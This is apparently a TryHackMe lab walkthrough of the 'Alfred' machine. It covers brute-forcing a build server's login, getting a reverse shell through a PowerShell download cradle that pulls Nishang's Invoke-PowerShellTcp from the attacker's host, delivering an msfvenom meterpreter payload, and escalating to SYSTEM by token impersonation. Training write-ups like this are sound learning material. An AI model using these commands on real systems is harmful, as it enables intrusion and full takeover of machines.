TryHackMe — Alfred Walkthrough

6 min readMay 2, 2020

Disclaimer:

This walkthrough is intended for documentation purpose. This is in no way the most efficient way to crack this machine nor the most amazing one. I do such documentation solely for write up and grammar practice LOL. Happy hacking!

Machine Information:

Task 1 — How many ports are open?

Accessing the site http://10.10.54.66:80 does not give much of information.

There is another port for web service that is open which is the port 8080.

Task 2 — What is the username and password for the log in panel(in the format username:password)

In order to brute force the login form using Hydra, the URL, Form parameter, and the Login error message should be accurate.

Getting the URL and the Form parameter can be accomplished using Burp.

Capture this traffic using BurpSuite Proxy

Parameters for Hydra:

URL: /j_acegi_security_check

USER = j_username

PASS = j_password

Port = 8080

For the username and password, you can use the most common one.

Successfully logging in to the website using admin:admin.

One of the notable section of the website is the “project”.

Accessing the “Configure” section provides the ability to run commands to this server.

Task 3:

Find a feature of the tool that allows you to execute commands on the underlying system. When you find this feature, you can use this command to get the reverse shell on your machine and then run it: powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port

You first need to download the Powershell script, and make it available for the server to download. You can do this by creating a http server with python: python3 -m http.server

In order to accomplish this task, the Invoke-PowerShellTcp.ps1 should be download to the kali machine and then open a web server using python.

The whole nishang-master can be downloaded from github but since the Invoke-PowerShellTcp.ps1 is the only that is needed, the script can just be downloaded from this link “https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1” and name it as Invoke-PowerShellTcp.ps1.

Open web server on the kali machine using python -m SimpleHTTPServer 80

In order to download the powershell script into the web server, the Configure feature of the server should be leverage using this command “powershell iex (New-Object Net.WebClient).DownloadString(‘http://10.9.8.234:80/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.9.8.234-Port 1337” and creating a netcat listener on the kali machine using this command “nc -lvnp 1337”.

After saving and applying the configuration on the Configure Tab, the “Build Now” must be click in order for the script to take effect.

Results:

Task 4: What is the user.txt flag?

Task 5: What is the final size of the exe payload that you generated?

In order to accomplish this task, create a metasploit payload using msfvenom.

The final size of the exe file is “73802 bytes”.

Use this command to download the payload into the target machine powershell “(New-Object System.Net.WebClient).Downloadfile(‘http://10.9.8.234:8000/shells.exe’,’shells.exe’)”

It is important to have the “python -m SimpleHTTPServer 8000" running on the folder which the shells.exe is located.

Upon successfully executing the command above, the shells.exe will be downloaded onto the target machine.

In order to execute the shells.exe, this command should be used “Start-Process “shells.exe”. But before executing this command, a listener should first be running on the kali machine. In this case it will be the multi/handler.

Now that the listener is running on the kali machine, it’s time to execute the shells.exe .

If it does not work at the first try, check the LHOST.

Change it to tun0 or the IP address provided by tryhackme then run the exploit again as well as the shells.exe on the target machine.

Successfully getting meterpreter shell!

Task 6: View all the privileges using whoami /priv

Task 7: You can see that two privileges(SeDebugPrivilege, SeImpersonatePrivilege) are enabled. Let's use the incognito module that will allow us to exploit this vulnerability. Enter: load_incognito to load the incognito module in metasploit. Please note, you may need to use the use incognito command if the previous command doesn't work. Also ensure that your metasploit is up to date.

Load incognito!

List tokens!

Impersonate token of the “BUILTIN\Administrator” in order to get the NT AUTHORITY\SYSTEM.

Task 8: Even though you have a higher privileged token you may not actually have the permissions of a privileged user (this is due to the way Windows handles permissions — it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do). Ensure that you migrate to a process with correct permissions (above questions answer). The safest process to pick is the services.exe process. First use the ps command to view processes and find the PID of the services.exe process. Migrate to this process using the command migrate PID-OF-PROCESS